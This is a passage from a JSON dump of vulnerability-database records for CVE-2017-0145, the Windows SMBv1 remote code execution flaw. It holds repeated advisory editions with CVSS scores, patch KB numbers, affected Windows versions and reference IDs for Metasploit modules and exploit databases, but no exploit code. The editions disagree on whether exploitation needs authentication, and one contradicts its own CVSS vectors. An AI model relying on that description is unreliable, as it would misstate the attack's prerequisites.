"references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-13T04:50:53", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", 
"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB4012216", "KB4012212", "KB4012215", "KB4012606", "KBMS16-110, 3187754", "KB3205401", "KB3210721", "KB4013198", "KB4012214", "KB4014077", "KB4012217", "KB4012598", "KB4013429", "KB3210720", "KB4012213", "KB3205409", "KB3177186", "KB3212646"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", 
"kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", 
"msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T04:50:53", "differentElements": ["msAffectedSoftware"], "edition": 42}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A 
remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-13T06:59:52", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB3210720", "KB3205401", "KB4013198", "KB4012216", "KB3205409", "KB3212646", "KB3213986", "KB4012213", "KBMS16-110, 3187754", "KB4012212", "KB4012598", "KB4012606", "KB4012217", "KB4013429", "KB4012214", "KB3177186", "KB3210721", "KB4014077"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": 
"KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": 
"KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit 
Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-13T06:59:52", "differentElements": ["msAffectedSoftware"], "edition": 43}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server; no credentials are needed (the CVSS vectors recorded below are Au:N / PR:N).\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-13T10:45:10", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", 
"MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", 
